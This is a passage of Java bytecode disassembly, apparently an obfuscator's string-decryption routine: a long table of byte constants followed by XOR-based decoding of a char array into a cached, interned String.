      1145: goto          2471
      1148: bipush        78
      1150: goto          2471
      1153: bipush        87
      1155: goto          2471
      1158: bipush        53
      1160: goto          2471
      1163: bipush        32
      1165: goto          2471
      1168: sipush        165
      1171: goto          2471
      1174: sipush        255
      1177: goto          2471
      1180: sipush        228
      1183: goto          2471
      1186: sipush        200
      1189: goto          2471
      1192: bipush        58
      1194: goto          2471
      1197: bipush        42
      1199: goto          2471
      1202: bipush        99
      1204: goto          2471
      1207: bipush        101
      1209: goto          2471
      1212: sipush        202
      1215: goto          2471
      1218: sipush        183
      1221: goto          2471
      1224: bipush        68
      1226: goto          2471
      1229: sipush        221
      1232: goto          2471
      1235: bipush        66
      1237: goto          2471
      1240: bipush        48
      1242: goto          2471
      1245: bipush        110
      1247: goto          2471
      1250: bipush        88
      1252: goto          2471
      1255: sipush        169
      1258: goto          2471
      1261: bipush        86
      1263: goto          2471
      1266: sipush        241
      1269: goto          2471
      1272: bipush        67
      1274: goto          2471
      1277: sipush        243
      1280: goto          2471
      1283: sipush        138
      1286: goto          2471
      1289: sipush        196
      1292: goto          2471
      1295: sipush        231
      1298: goto          2471
      1301: sipush        147
      1304: goto          2471
      1307: bipush        60
      1309: goto          2471
      1312: bipush        30
      1314: goto          2471
      1317: sipush        254
      1320: goto          2471
      1323: bipush        107
      1325: goto          2471
      1328: sipush        171
      1331: goto          2471
      1334: bipush        19
      1336: goto          2471
      1339: sipush        139
      1342: goto          2471
      1345: bipush        24
      1347: goto          2471
      1350: sipush        227
      1353: goto          2471
      1356: iconst_5
      1357: goto          2471
      1360: sipush        164
      1363: goto          2471
      1366: sipush        185
      1369: goto          2471
      1372: sipush        160
      1375: goto          2471
      1378: sipush        251
      1381: goto          2471
      1384: bipush        35
      1386: goto          2471
      1389: bipush        15
      1391: goto          2471
      1394: bipush        55
      1396: goto          2471
      1399: bipush        41
      1401: goto          2471
      1404: bipush        57
      1406: goto          2471
      1409: bipush        104
      1411: goto          2471
      1414: sipush        179
      1417: goto          2471
      1420: sipush        158
      1423: goto          2471
      1426: sipush        128
      1429: goto          2471
      1432: sipush        213
      1435: goto          2471
      1438: bipush        39
      1440: goto          2471
      1443: sipush        148
      1446: goto          2471
      1449: bipush        14
      1451: goto          2471
      1454: bipush        70
      1456: goto          2471
      1459: bipush        90
      1461: goto          2471
      1464: sipush        143
      1467: goto          2471
      1470: bipush        75
      1472: goto          2471
      1475: sipush        198
      1478: goto          2471
      1481: sipush        207
      1484: goto          2471
      1487: bipush        102
      1489: goto          2471
      1492: sipush        236
      1495: goto          2471
      1498: sipush        206
      1501: goto          2471
      1504: sipush        157
      1507: goto          2471
      1510: bipush        92
      1512: goto          2471
      1515: bipush        74
      1517: goto          2471
      1520: sipush        233
      1523: goto          2471
      1526: bipush        43
      1528: goto          2471
      1531: bipush        46
      1533: goto          2471
      1536: sipush        172
      1539: goto          2471
      1542: sipush        177
      1545: goto          2471
      1548: sipush        159
      1551: goto          2471
      1554: iconst_0
      1555: goto          2471
      1558: sipush        190
      1561: goto          2471
      1564: sipush        205
      1567: goto          2471
      1570: bipush        117
      1572: goto          2471
      1575: sipush        216
      1578: goto          2471
      1581: bipush        127
      1583: goto          2471
      1586: sipush        203
      1589: goto          2471
      1592: sipush        189
      1595: goto          2471
      1598: bipush        114
      1600: goto          2471
      1603: sipush        161
      1606: goto          2471
      1609: bipush        49
      1611: goto          2471
      1614: bipush        91
      1616: goto          2471
      1619: sipush        176
      1622: goto          2471
      1625: sipush        234
      1628: goto          2471
      1631: bipush        63
      1633: goto          2471
      1636: sipush        173
      1639: goto          2471
      1642: bipush        28
      1644: goto          2471
      1647: bipush        116
      1649: goto          2471
      1652: sipush        199
      1655: goto          2471
      1658: bipush        122
      1660: goto          2471
      1663: sipush        163
      1666: goto          2471
      1669: bipush        118
      1671: goto          2471
      1674: bipush        93
      1676: goto          2471
      1679: bipush        20
      1681: goto          2471
      1684: sipush        132
      1687: goto          2471
      1690: sipush        156
      1693: goto          2471
      1696: bipush        56
      1698: goto          2471
      1701: sipush        244
      1704: goto          2471
      1707: sipush        130
      1710: goto          2471
      1713: bipush        126
      1715: goto          2471
      1718: sipush        237
      1721: goto          2471
      1724: sipush        188
      1727: goto          2471
      1730: bipush        8
      1732: goto          2471
      1735: sipush        184
      1738: goto          2471
      1741: bipush        84
      1743: goto          2471
      1746: sipush        215
      1749: goto          2471
      1752: sipush        133
      1755: goto          2471
      1758: bipush        62
      1760: goto          2471
      1763: sipush        154
      1766: goto          2471
      1769: sipush        247
      1772: goto          2471
      1775: bipush        96
      1777: goto          2471
      1780: sipush        187
      1783: goto          2471
      1786: sipush        201
      1789: goto          2471
      1792: sipush        252
      1795: goto          2471
      1798: sipush        211
      1801: goto          2471
      1804: bipush        50
      1806: goto          2471
      1809: bipush        85
      1811: goto          2471
      1814: bipush        17
      1816: goto          2471
      1819: bipush        23
      1821: goto          2471
      1824: sipush        246
      1827: goto          2471
      1830: sipush        239
      1833: goto          2471
      1836: sipush        209
      1839: goto          2471
      1842: bipush        81
      1844: goto          2471
      1847: sipush        194
      1850: goto          2471
      1853: bipush        11
      1855: goto          2471
      1858: bipush        38
      1860: goto          2471
      1863: bipush        71
      1865: goto          2471
      1868: sipush        131
      1871: goto          2471
      1874: bipush        106
      1876: goto          2471
      1879: sipush        191
      1882: goto          2471
      1885: sipush        181
      1888: goto          2471
      1891: sipush        182
      1894: goto          2471
      1897: bipush        80
      1899: goto          2471
      1902: sipush        208
      1905: goto          2471
      1908: bipush        27
      1910: goto          2471
      1913: sipush        186
      1916: goto          2471
      1919: sipush        152
      1922: goto          2471
      1925: sipush        240
      1928: goto          2471
      1931: bipush        124
      1933: goto          2471
      1936: sipush        222
      1939: goto          2471
      1942: bipush        89
      1944: goto          2471
      1947: bipush        44
      1949: goto          2471
      1952: bipush        109
      1954: goto          2471
      1957: sipush        129
      1960: goto          2471
      1963: sipush        223
      1966: goto          2471
      1969: iconst_2
      1970: goto          2471
      1973: sipush        178
      1976: goto          2471
      1979: bipush        82
      1981: goto          2471
      1984: bipush        112
      1986: goto          2471
      1989: sipush        217
      1992: goto          2471
      1995: bipush        111
      1997: goto          2471
      2000: sipush        219
      2003: goto          2471
      2006: sipush        166
      2009: goto          2471
      2012: sipush        245
      2015: goto          2471
      2018: bipush        103
      2020: goto          2471
      2023: bipush        31
      2025: goto          2471
      2028: bipush        45
      2030: goto          2471
      2033: bipush        12
      2035: goto          2471
      2038: bipush        26
      2040: goto          2471
      2043: sipush        226
      2046: goto          2471
      2049: sipush        224
      2052: goto          2471
      2055: bipush        40
      2057: goto          2471
      2060: sipush        144
      2063: goto          2471
      2066: sipush        135
      2069: goto          2471
      2072: sipush        193
      2075: goto          2471
      2078: bipush        22
      2080: goto          2471
      2083: bipush        98
      2085: goto          2471
      2088: bipush        108
      2090: goto          2471
      2093: bipush        61
      2095: goto          2471
      2098: sipush        151
      2101: goto          2471
      2104: sipush        134
      2107: goto          2471
      2110: sipush        249
      2113: goto          2471
      2116: sipush        225
      2119: goto          2471
      2122: sipush        149
      2125: goto          2471
      2128: sipush        195
      2131: goto          2471
      2134: bipush        47
      2136: goto          2471
      2139: sipush        250
      2142: goto          2471
      2145: bipush        65
      2147: goto          2471
      2150: sipush        167
      2153: goto          2471
      2156: bipush        33
      2158: goto          2471
      2161: bipush        21
      2163: goto          2471
      2166: sipush        242
      2169: goto          2471
      2172: sipush        232
      2175: goto          2471
      2178: bipush        73
      2180: goto          2471
      2183: bipush        79
      2185: goto          2471
      2188: sipush        137
      2191: goto          2471
      2194: bipush        7
      2196: goto          2471
      2199: sipush        142
      2202: goto          2471
      2205: bipush        36
      2207: goto          2471
      2210: sipush        192
      2213: goto          2471
      2216: sipush        238
      2219: goto          2471
      2222: sipush        153
      2225: goto          2471
      2228: sipush        141
      2231: goto          2471
      2234: sipush        168
      2237: goto          2471
      2240: sipush        214
      2243: goto          2471
      2246: sipush        150
      2249: goto          2471
      2252: sipush        140
      2255: goto          2471
      2258: sipush        220
      2261: goto          2471
      2264: bipush        10
      2266: goto          2471
      2269: sipush        175
      2272: goto          2471
      2275: bipush        100
      2277: goto          2471
      2280: bipush        120
      2282: goto          2471
      2285: bipush        123
      2287: goto          2471
      2290: bipush        119
      2292: goto          2471
      2295: bipush        115
      2297: goto          2471
      2300: bipush        94
      2302: goto          2471
      2305: sipush        204
      2308: goto          2471
      2311: sipush        146
      2314: goto          2471
      2317: sipush        253
      2320: goto          2471
      2323: bipush        51
      2325: goto          2471
      2328: sipush        136
      2331: goto          2471
      2334: bipush        9
      2336: goto          2471
      2339: sipush        218
      2342: goto          2471
      2345: sipush        180
      2348: goto          2471
      2351: bipush        64
      2353: goto          2471
      2356: sipush        174
      2359: goto          2471
      2362: bipush        54
      2364: goto          2471
      2367: iconst_3
      2368: goto          2471
      2371: iconst_4
      2372: goto          2471
      2375: bipush        16
      2377: goto          2471
      2380: bipush        76
      2382: goto          2471
      2385: bipush        77
      2387: goto          2471
      2390: iconst_1
      2391: goto          2471
      2394: sipush        197
      2397: goto          2471
      2400: bipush        37
      2402: goto          2471
      2405: bipush        72
      2407: goto          2471
      2410: bipush        97
      2412: goto          2471
      2415: bipush        59
      2417: goto          2471
      2420: sipush        230
      2423: goto          2471
      2426: bipush        105
      2428: goto          2471
      2431: sipush        248
      2434: goto          2471
      2437: sipush        145
      2440: goto          2471
      2443: bipush        69
      2445: goto          2471
      2448: bipush        18
      2450: goto          2471
      2453: bipush        29
      2455: goto          2471
      2458: sipush        155
      2461: goto          2471
      2464: bipush        52
      2466: goto          2471
      2469: bipush        121
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #5                  // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #405                // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #48                 // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #81                 // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #185                // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #405                // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn
}
